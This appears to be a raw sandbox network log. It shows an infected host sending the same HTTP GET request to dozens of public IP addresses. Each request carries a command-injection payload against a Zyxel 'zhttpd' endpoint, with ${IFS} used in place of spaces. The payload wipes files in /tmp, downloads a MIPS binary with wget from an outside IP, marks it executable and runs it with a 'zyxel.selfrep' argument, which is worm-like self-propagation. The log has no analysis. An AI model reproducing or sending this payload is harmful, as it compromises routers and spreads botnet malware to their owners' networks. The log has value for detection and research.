                                            Jan 14, 2024 15:50:30.262381077 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1749192.168.2.23586984.131.76.27443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:30.262401104 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1750192.168.2.2345826143.111.233.171443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:30.262460947 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1751192.168.2.2337838158.39.75.176443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:30.262495995 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1752192.168.2.235087432.135.22.206443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:30.262497902 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1753192.168.2.235466045.61.14.39443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:30.262528896 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1754192.168.2.2335432209.238.114.137443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:30.262562037 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1755192.168.2.234161281.29.101.174443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:30.262578964 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1756192.168.2.2356038191.188.211.226443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:30.262622118 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1757192.168.2.235436446.45.34.15443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:30.262653112 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1758192.168.2.2336692223.208.57.13443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:30.262665987 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1759192.168.2.235774843.8.13.228443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:30.262680054 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1760192.168.2.2347540113.204.69.234443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:30.262722015 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1761192.168.2.2338438156.136.195.11443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:30.262761116 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1762192.168.2.235223249.238.73.11443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:30.262788057 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1763192.168.2.2353202171.50.158.111443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:30.262808084 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1764192.168.2.235236893.185.40.251443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:30.262852907 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1765192.168.2.235562265.36.9.83443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:30.262878895 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1766192.168.2.2340720146.194.177.133443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:30.262909889 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1767192.168.2.2357810203.11.84.210443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:30.262937069 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1768192.168.2.2337610206.35.129.152443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:30.262968063 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1769192.168.2.234264097.224.35.233443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:30.262988091 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1770192.168.2.235033892.51.90.43443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:30.263000011 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1771192.168.2.2333282150.95.198.199443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:30.263041019 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1772192.168.2.2356136106.10.141.16443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:30.263067007 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1773192.168.2.2342934128.200.119.102443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:30.263068914 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1774192.168.2.2340434156.99.0.99443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:30.263123989 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1775192.168.2.236028682.61.35.206443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:30.263153076 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1776192.168.2.2355018115.91.15.48443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:30.263191938 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1777192.168.2.2345812115.228.211.5443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:30.263211012 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1778192.168.2.233517071.254.0.164443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:30.263238907 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1779192.168.2.23534709.193.232.213443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:30.263242006 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1780192.168.2.2335586154.184.24.151443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:30.263246059 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1781192.168.2.2348196102.201.189.67443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:30.263278961 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1782192.168.2.2348620206.155.25.168443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:30.263309956 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1783192.168.2.2354510182.216.175.186443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:30.263318062 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1784192.168.2.2342638119.54.18.174443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:30.263338089 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1785192.168.2.2333502165.37.254.74443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:30.263410091 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1786192.168.2.2356856105.51.127.150443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:30.263426065 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1787192.168.2.2350686179.60.85.167443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:30.263441086 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1788192.168.2.235732243.89.26.33443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:30.263469934 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1789192.168.2.2351062192.191.107.211443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:30.263484955 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1790192.168.2.236067238.104.195.148443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:30.263544083 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1791192.168.2.236032893.218.84.252443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:30.263575077 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1792192.168.2.2354014182.89.190.231443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:30.263601065 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1793192.168.2.2341038112.234.84.123443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:30.263641119 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1794192.168.2.2352044117.0.175.233443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:30.263670921 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1795192.168.2.235099648.165.2.43443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:30.263689995 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1796192.168.2.2335682178.18.68.216443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:30.263715982 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1797192.168.2.234582297.176.1.49443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:30.263741970 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1798192.168.2.23520022.59.89.50443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:30.263782978 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1799192.168.2.2332846158.20.229.241443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:30.263796091 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1800192.168.2.233614087.241.161.129443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:30.263835907 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1801192.168.2.2342162193.10.174.52443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:30.263855934 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1802192.168.2.2343444222.82.53.215443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:30.263890028 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1803192.168.2.2347446132.195.52.23443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:30.263914108 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1804192.168.2.2356446156.166.53.74443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:30.263933897 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1805192.168.2.2356814154.12.14.205443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:30.263961077 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1806192.168.2.236035473.190.154.224443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:30.263966084 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1807192.168.2.2349586176.218.233.104443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:30.264023066 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1808192.168.2.234285417.89.81.241443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:30.264060020 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1809192.168.2.2350544197.94.44.171443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:30.264076948 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1810192.168.2.235124499.6.113.75443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:30.264118910 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1811192.168.2.2340626145.68.83.166443
                                            TimestampBytes transferredDirectionData
